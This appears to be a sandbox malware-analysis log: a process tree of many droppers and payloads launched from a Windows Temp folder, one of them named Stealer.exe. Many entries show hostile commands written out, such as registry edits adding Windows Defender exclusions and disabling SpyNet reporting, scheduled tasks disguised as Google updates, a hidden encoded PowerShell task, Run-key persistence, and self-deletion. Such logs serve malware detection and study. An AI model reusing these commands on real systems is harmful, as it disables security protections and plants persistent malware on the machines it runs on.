- - C:\Users\Admin\AppData\Local\Temp\a\DH.exe
    "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
    3⤵
    PID:8404
- C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
  2⤵
  PID:6464
- - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
    3⤵
    PID:8788
- C:\Users\Admin\AppData\Local\Temp\a\txx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\txx.exe"
  2⤵
  PID:6584
- - C:\Users\Admin\AppData\Local\Temp\a\txx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\txx.exe"
    3⤵
    PID:10112
- - C:\Users\Admin\AppData\Local\Temp\a\txx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\txx.exe"
    3⤵
    PID:5756
- C:\Users\Admin\AppData\Local\Temp\a\aao.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
  2⤵
  PID:6808
- - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
    "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
    3⤵
    PID:9228
- C:\Users\Admin\AppData\Local\Temp\a\ezy.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"
  2⤵
  PID:7024
- - C:\Users\Admin\AppData\Local\Temp\a\ezy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"
    3⤵
    PID:8140
- - C:\Users\Admin\AppData\Local\Temp\a\ezy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"
    3⤵
    PID:3624
- C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe"
  2⤵
  PID:6280
- C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
  2⤵
  PID:6492
- - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:7944
- C:\Users\Admin\AppData\Local\Temp\a\HQR8391000.pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HQR8391000.pdf.exe"
  2⤵
  PID:6316
- C:\Users\Admin\AppData\Local\Temp\a\newrock.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"
  2⤵
  PID:7536
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:7392
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:7920
- - C:\Users\Admin\AppData\Local\Temp\kos2.exe
    "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
    3⤵
    PID:3028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 780
      4⤵
      Program crash
      PID:7496
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    PID:7504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      4⤵
      PID:420
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      PID:1112
    - - C:\Windows\System32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        
        PID:8860
    - - C:\Windows\System32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        
        PID:6788
    - - C:\Windows\System32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        
        PID:6972
    - - C:\Windows\System32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:6812
- C:\Users\Admin\AppData\Local\Temp\a\foto2552.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto2552.exe"
  2⤵
  PID:7904
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nd8os8PI.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nd8os8PI.exe
    3⤵
    PID:8092
- C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe"
  2⤵
  PID:4252
- - C:\Users\Admin\Pictures\SWnGtFoDeJb3G7tV9XeOVHcT.exe
    "C:\Users\Admin\Pictures\SWnGtFoDeJb3G7tV9XeOVHcT.exe"
    3⤵
    PID:8444
- - C:\Users\Admin\Pictures\lA87cg3HOkRY71wRNEDNl0Yz.exe
    "C:\Users\Admin\Pictures\lA87cg3HOkRY71wRNEDNl0Yz.exe"
    3⤵
    PID:8628
- - C:\Users\Admin\Pictures\YahNoaCBtf06s5XqrHdPuVh1.exe
    "C:\Users\Admin\Pictures\YahNoaCBtf06s5XqrHdPuVh1.exe"
    3⤵
    PID:8760
  - - C:\Users\Admin\Pictures\YahNoaCBtf06s5XqrHdPuVh1.exe
      "C:\Users\Admin\Pictures\YahNoaCBtf06s5XqrHdPuVh1.exe"
      4⤵
      PID:9068
- - C:\Users\Admin\Pictures\eraKZ3pGBrXjQNcr1KOa9lvp.exe
    "C:\Users\Admin\Pictures\eraKZ3pGBrXjQNcr1KOa9lvp.exe"
    3⤵
    PID:8904
- - C:\Users\Admin\Pictures\yf7Xo15jCbyo9gv0lWvXTDqi.exe
    "C:\Users\Admin\Pictures\yf7Xo15jCbyo9gv0lWvXTDqi.exe"
    3⤵
    PID:9168
- - C:\Users\Admin\Pictures\IrhaxEcKekoGYyKpbKW4Sxqs.exe
    "C:\Users\Admin\Pictures\IrhaxEcKekoGYyKpbKW4Sxqs.exe"
    3⤵
    PID:9204
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\arriveprospect.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\arriveprospect.exe
      4⤵
      PID:7788
- - C:\Users\Admin\Pictures\cUD3vDhSLMTqK1YuLEf27Pgw.exe
    "C:\Users\Admin\Pictures\cUD3vDhSLMTqK1YuLEf27Pgw.exe"
    3⤵
    PID:9072
  - - C:\Users\Admin\AppData\Local\Temp\7zS3CD0.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:7928
    - - C:\Users\Admin\AppData\Local\Temp\7zS42DB.tmp\Install.exe
        
        .\Install.exe /embdidylQsC "385121" /S
        5⤵
        
        PID:5416
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:8032
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:10496
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:10952
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:7348
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:10752
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:8000
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gLZTmdKeW" /SC once /ST 07:11:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:10288
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gLZTmdKeW"
        6⤵
        
        PID:10964
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gLZTmdKeW"
        6⤵
        
        PID:3816
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 11:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\pmgpVSP.exe\" 3Y /IFsite_idNVs 385121 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:10920
- - C:\Users\Admin\Pictures\Ml7n23PQaaBcn4Xa2JSx5TS8.exe
    "C:\Users\Admin\Pictures\Ml7n23PQaaBcn4Xa2JSx5TS8.exe"
    3⤵
    PID:8304
- - C:\Users\Admin\Pictures\rMNxGPA9fJrF3oCzDTRq87rs.exe
    "C:\Users\Admin\Pictures\rMNxGPA9fJrF3oCzDTRq87rs.exe" --silent --allusers=0
    3⤵
    PID:8228
  - - C:\Users\Admin\Pictures\rMNxGPA9fJrF3oCzDTRq87rs.exe
      C:\Users\Admin\Pictures\rMNxGPA9fJrF3oCzDTRq87rs.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x68ee8538,0x68ee8548,0x68ee8554
      4⤵
      PID:8840
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\rMNxGPA9fJrF3oCzDTRq87rs.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\rMNxGPA9fJrF3oCzDTRq87rs.exe" --version
      4⤵
      PID:8536
- - C:\Users\Admin\Pictures\gOsa8ciE9gJKHNZvvv0gH0Qe.exe
    "C:\Users\Admin\Pictures\gOsa8ciE9gJKHNZvvv0gH0Qe.exe"
    3⤵
    PID:8524
- - C:\Users\Admin\Pictures\IKcosBHm5uIOwlU1cCY1lflD.exe
    "C:\Users\Admin\Pictures\IKcosBHm5uIOwlU1cCY1lflD.exe"
    3⤵
    PID:6620
- - C:\Users\Admin\Pictures\EUF9ZzRA58zhySAOTg0qxYyK.exe
    "C:\Users\Admin\Pictures\EUF9ZzRA58zhySAOTg0qxYyK.exe"
    3⤵
    PID:12152
  - - C:\Users\Admin\AppData\Local\Temp\7zS4AA3.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:11604
    - - C:\Users\Admin\AppData\Local\Temp\7zS5FB2.tmp\Install.exe
        
        .\Install.exe /embdidylQsC "385121" /S
        5⤵
        
        PID:8368
- - C:\Users\Admin\Pictures\sXCs9egcxXap8o69bSQdm8SC.exe
    "C:\Users\Admin\Pictures\sXCs9egcxXap8o69bSQdm8SC.exe"
    3⤵
    PID:9868
- - C:\Users\Admin\Pictures\hDkn4Qxh7IDT8TWULar6lIKK.exe
    "C:\Users\Admin\Pictures\hDkn4Qxh7IDT8TWULar6lIKK.exe"
    3⤵
    PID:7848
- - C:\Users\Admin\Pictures\9WD1udhV9mp5P2oUSKDBiMBW.exe
    "C:\Users\Admin\Pictures\9WD1udhV9mp5P2oUSKDBiMBW.exe"
    3⤵
    PID:11240
- C:\Users\Admin\AppData\Local\Temp\a\source2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\source2.exe"
  2⤵
  PID:2192
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:9192
- C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
  "C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"
  2⤵
  PID:7220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
    3⤵
    PID:7668
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:8476
- C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe
  "C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"
  2⤵
  PID:6376
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c difficspec.bat
    3⤵
    PID:7096
- C:\Users\Admin\AppData\Local\Temp\a\sus.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sus.exe"
  2⤵
  PID:5804
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:8424
- C:\Users\Admin\AppData\Local\Temp\a\nalo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nalo.exe"
  2⤵
  PID:5320
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:9112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:9388
- C:\Users\Admin\AppData\Local\Temp\a\amday.exe
  "C:\Users\Admin\AppData\Local\Temp\a\amday.exe"
  2⤵
  PID:8144
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
    3⤵
    PID:8684
- C:\Users\Admin\AppData\Local\Temp\a\rengad.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 9540
    3⤵
    - Program crash
    PID:5392
- C:\Users\Admin\AppData\Local\Temp\a\sihost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"
  2⤵
  PID:8292
- - C:\Users\Admin\AppData\Local\Temp\a\sihost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"
    3⤵
    PID:6596
- C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe
  "C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"
  2⤵
  PID:8528
- - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\towardlowestpro.exe
    C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\towardlowestpro.exe
    3⤵
    PID:8584
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\towardlowest.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\towardlowest.exe
      4⤵
      PID:8664
- C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"
  2⤵
  PID:8780
- - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\callcustomerpro.exe
    C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\callcustomerpro.exe
    3⤵
    PID:8828
  - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\callcustomer.exe
      C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\callcustomer.exe
      4⤵
      PID:8880
- C:\Users\Admin\AppData\Local\Temp\a\windows.exe
  "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
  2⤵
  PID:9136
- C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe"
  2⤵
  PID:4048
- C:\Users\Admin\AppData\Local\Temp\a\1712.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
  2⤵
  PID:8432
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
    3⤵
    PID:10308
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
      4⤵
      PID:9312
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c Copy "C:\Users\Admin\AppData\Local\Temp\a\1712.exe" "C:\Users\Admin\Documents\1712.pif"
    3⤵
    PID:7268
- - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
    3⤵
    PID:5728
- - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
    3⤵
    PID:9828
- C:\Users\Admin\AppData\Local\Temp\a\kung.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
  2⤵
  PID:7132
- - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
    3⤵
    PID:9112
- C:\Users\Admin\AppData\Local\Temp\a\win.exe
  "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
  2⤵
  PID:9700
- C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"
  2⤵
  PID:6652
- C:\Users\Admin\AppData\Local\Temp\a\build1111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build1111.exe"
  2⤵
  PID:9624
- C:\Users\Admin\AppData\Local\Temp\a\build9999.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build9999.exe"
  2⤵
  PID:7328
- C:\Users\Admin\AppData\Local\Temp\a\lnstalIer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\lnstalIer.exe"
  2⤵
  PID:9632
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:10128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:5476
- C:\Users\Admin\AppData\Local\Temp\a\trafico.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trafico.exe"
  2⤵
  PID:10132
- C:\Users\Admin\AppData\Local\Temp\a\cats.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cats.exe"
  2⤵
  PID:7916
- C:\Users\Admin\AppData\Local\Temp\a\deluxe_crypted1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\deluxe_crypted1234.exe"
  2⤵
  PID:9020
- C:\Users\Admin\AppData\Local\Temp\a\htmlc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\htmlc.exe"
  2⤵
  PID:2932
- - C:\Users\Admin\AppData\Local\Temp\dslwsx.exe
    "C:\Users\Admin\AppData\Local\Temp\dslwsx.exe"
    3⤵
    PID:4100
  - - C:\Users\Admin\AppData\Local\Temp\dslwsx.exe
      "C:\Users\Admin\AppData\Local\Temp\dslwsx.exe"
      4⤵
      PID:2500
- C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe"
  2⤵
  PID:9580
- C:\Users\Admin\AppData\Local\Temp\a\Stealer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Stealer.exe"
  2⤵
  PID:3960
- C:\Users\Admin\AppData\Local\Temp\a\buildtest.exe
  "C:\Users\Admin\AppData\Local\Temp\a\buildtest.exe"
  2⤵
  PID:4188
- C:\Users\Admin\AppData\Local\Temp\a\cllip.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cllip.exe"
  2⤵
  PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s268.0.bat" "
    3⤵
    PID:220
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:7728
  - - C:\ProgramData\presepuesto\LEAJ.exe
      "C:\ProgramData\presepuesto\LEAJ.exe"
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        5⤵
        Creates scheduled task(s)
        
        PID:6776
- C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
  2⤵
  PID:9628
- - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
    3⤵
    PID:7776
- C:\Users\Admin\AppData\Local\Temp\a\build5555.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build5555.exe"
  2⤵
  PID:3360
- - C:\Users\Admin\AppData\Local\Temp\a\build5555.exe
    "C:\Users\Admin\AppData\Local\Temp\a\build5555.exe"
    3⤵
    PID:7032
- C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe"
  2⤵
  PID:2532
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    3⤵
    PID:1964
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    3⤵
    PID:9484
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    3⤵
    PID:9096
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  PID:5824
- C:\Users\Admin\AppData\Local\Temp\a\Crypted_new.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Crypted_new.exe"
  2⤵
  PID:7900
- C:\Users\Admin\AppData\Local\Temp\a\2-3-0_2023-10-05_14-14.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2-3-0_2023-10-05_14-14.exe"
  2⤵
  PID:7076
- C:\Users\Admin\AppData\Local\Temp\a\EpPDrE.exe
  "C:\Users\Admin\AppData\Local\Temp\a\EpPDrE.exe"
  2⤵
  PID:9376
- C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HTML.exe"
  2⤵
  PID:9828
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\movwXShFsgOqA" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD2E2.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5316
- - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
    "{path}"
    3⤵
    PID:9300
- C:\Users\Admin\AppData\Local\Temp\a\audiogse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiogse.exe"
  2⤵
  PID:5856
- - C:\Users\Admin\AppData\Local\Temp\dmnvd.exe
    "C:\Users\Admin\AppData\Local\Temp\dmnvd.exe"
    3⤵
    PID:4528
  - - C:\Users\Admin\AppData\Local\Temp\dmnvd.exe
      "C:\Users\Admin\AppData\Local\Temp\dmnvd.exe"
      4⤵
      PID:9044
- C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
  2⤵
  PID:1200
- C:\Users\Admin\AppData\Local\Temp\a\3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\3.exe"
  2⤵
  PID:3700
- C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
  2⤵
  PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:7068
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:10024
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p985125742679522981943222763 -oextracted
      4⤵
      PID:10176
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_5.zip -oextracted
      4⤵
      PID:10304
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_4.zip -oextracted
      4⤵
      PID:12104
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  PID:5400
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  PID:9936
- C:\Users\Admin\AppData\Local\Temp\a\client.exe
  "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
  2⤵
  PID:9804
- C:\Users\Admin\AppData\Local\Temp\a\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bin.exe"
  2⤵
  PID:7780
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4116
- C:\Users\Admin\AppData\Local\Temp\a\i.exe
  "C:\Users\Admin\AppData\Local\Temp\a\i.exe"
  2⤵
  PID:8128
- C:\Users\Admin\AppData\Local\Temp\a\Eliz4444.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Eliz4444.exe"
  2⤵
  PID:3640
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:6552
- C:\Users\Admin\AppData\Local\Temp\a\Jefutyl.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Jefutyl.exe"
  2⤵
  PID:5376
- C:\Users\Admin\AppData\Local\Temp\a\rqrba.exe
  "C:\Users\Admin\AppData\Local\Temp\a\rqrba.exe"
  2⤵
  PID:9480
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:7664
- C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe
  "C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe"
  2⤵
  PID:8948
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
